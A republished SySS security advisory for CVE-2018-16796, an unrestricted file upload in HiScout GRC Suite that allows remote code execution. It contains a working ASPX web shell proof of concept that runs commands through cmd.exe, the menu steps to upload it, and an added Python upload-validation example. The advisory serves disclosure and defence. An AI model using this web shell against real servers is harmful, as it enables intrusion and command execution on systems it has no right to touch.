HiScout GRC Suite File Upload

Published: 13 Sep 2018 00:00:00
Reported by: Sebastian Auwaerter
Type: packetstorm
Source: packetstormsecurity.com
Views: 71

HiScout GRC Suite allows unrestricted file upload leading to remote code execution. Upgrade to version 3.1.

Related (reporter: title, published)

- CVE: CVE-2018-16796, 13 Sep 2018 16:00
- Cvelist: CVE-2018-16796, 13 Sep 2018 16:00
- EUVD: EUVD-2018-8596, 7 Oct 2025 00:30
- NVD: CVE-2018-16796, 13 Sep 2018 16:29
- Prion: Design/Logic Flaw, 13 Sep 2018 16:29

`Advisory ID: SYSS-2018-015   
Product: HiScout GRC Suite  
Manufacturer: HiScout GmbH  
Affected Version(s): < 3.1.5  
Tested Version(s): 3.1.3.12  
Vulnerability Type: Unrestricted Upload of File with Dangerous Type  
Risk Level: High  
Solution Status: Fixed  
Manufacturer Notification: 2018-07-26  
Solution Date: 2018-09-03  
Public Disclosure: 2018-09-12  
CVE Reference: CVE-2018-16796  
Author of Advisory: Sebastian Auwaerter, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
HiScout GRC Suite is a platform for managing IT governance, risk and  
compliance.  
  
The manufacturer describes the various modules of the   
product as follows (see [1]):  
  
The HiScout ISM module is geared toward meeting the requirements of the   
ISO 27000 series of international standards, and provides a reliable   
basis for the information management systems control loop.  
  
The HiScout Grundschutz module fully supports operations toward BSI   
standard 100-2. HiScout Grundschutz comes geared to BSI specifications   
and can smoothly incorporate existing data from other tools, such as   
GSTOOL. The HiScout BCM module is a new generation of BCM tools that can  
generate quantifiable benefits even when there is no emergency, and is   
therefore not only used to help you to plan for circumstances that will  
hopefully never arise.   
  
Because neither the file extension nor the content of files uploaded in  
place of an image is checked, HiScout GRC Suite is vulnerable to remote  
code execution.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
An authenticated attacker with the permission to edit or add a  
"WebSiteElement" to the "content" pages is able to upload any file  
with any file extension to the data directory of the application. This  
directory is in the web root and the uploaded file is executed on   
the server if ".aspx" is chosen as the file extension and if the file   
contains aspx source code. Any commands can be executed with the  
permissions of the web server user on the server by exploiting this  
vulnerability.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC)  
  
To reproduce this issue on a German instance of HiScout GRC Suite,  
choose "Inhalte" -> "Neu" -> "WebSiteElement" (the English equivalent  
is "Content" -> "New" -> "WebSiteElement") and upload the following   
file via the file upload on the right-hand side of the "InfoEditor":  
  
filename: whoami.aspx  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
<%@ Page Language="C#" Debug="true" Trace="false" %>  
<%@ Import Namespace="System.Diagnostics" %>  
<%@ Import Namespace="System.IO" %>  
<html>  
<head>  
<title>Code Execution PoC</title>  
</head>  
<body>  
<%   
String a = "whoami";  
ProcessStartInfo psi = new ProcessStartInfo();  
psi.FileName = "cmd.exe";  
psi.Arguments = "/c "+ a;  
psi.RedirectStandardOutput = true;  
psi.UseShellExecute = false;  
Process p = Process.Start(psi);  
StreamReader stmrdr = p.StandardOutput;  
String s = stmrdr.ReadToEnd();  
stmrdr.Close();  
  
Response.Write("<li>");  
Response.Write(s);  
Response.Write("</li>");  
%>  
</body>  
</html>  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Now, either visit the uploaded file by navigating to   
http(s)://<vulnerable-server>/<image-directory>/whoami.aspx or open the  
page where the newly created "WebSiteElement" is shown and follow the  
path of the "image" that is not loaded properly.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Update to software version 3.1.5  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2018-07-25: Vulnerability discovered  
2018-07-26: Vulnerability reported to manufacturer  
2018-09-03: Patch released by manufacturer  
2018-09-12: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for HiScout BCM   
https://www.hiscout.com/en/  
[2] SySS Security Advisory SYSS-2018-015  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-015.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Sebastian Auwaerter of SySS   
GmbH.  
  
E-Mail: sebastian.auwaerter at syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc  
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6   
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: https://creativecommons.org/licenses/by/3.0/deed.en  
`
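
The advisory traces the issue to a missing check of both the file extension and the content of files uploaded in place of an image. As an added example (not taken from the advisory or from HiScout's code), the Python below shows one way to perform that check at upload time; the function names, the allow-list and the sample byte strings are assumptions constructed for illustration.

```python
import os
import uuid

# Allow-list: extension -> magic-byte prefixes a genuine file of that type starts with.
IMAGE_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def upload_extension(filename):
    """Lower-cased final extension of the client-supplied name, path components dropped."""
    name = os.path.basename(filename.replace("\\", "/"))
    # Windows drops trailing dots and spaces on disk, so "x.aspx." is saved as "x.aspx".
    return os.path.splitext(name.rstrip(". "))[1].lower()

def validate_image_upload(filename, data):
    """Return (accepted, reason); extension and content must both match one image type."""
    ext = upload_extension(filename)
    if ext not in IMAGE_SIGNATURES:
        return False, "extension %s not allowed" % (ext or "(none)")
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not match extension"
    return True, "ok"

def stored_name(filename, data):
    """Server-chosen file name: random stem plus the validated, allow-listed extension."""
    accepted, reason = validate_image_upload(filename, data)
    if not accepted:
        raise ValueError(reason)
    return uuid.uuid4().hex + upload_extension(filename)

# Constructed sample inputs (not captured from a real system).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_ASPX = b'<%@ Page Language="C#" %>'

if __name__ == "__main__":
    for name, body in [("whoami.aspx", SAMPLE_ASPX), ("logo.png", SAMPLE_ASPX),
                       ("whoami.aspx.", SAMPLE_PNG), ("logo.PNG", SAMPLE_PNG)]:
        print(name, validate_image_upload(name, body))
```

A magic-byte prefix can be placed in front of script source, so the extension allow-list and the server-chosen name are what keep the stored file from being mapped to a script handler; keeping the upload directory outside the web root, or non-executable, covers the case where validation is bypassed.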

Vulners AI Score: 8.9 (High risk)
EPSS: 0.00719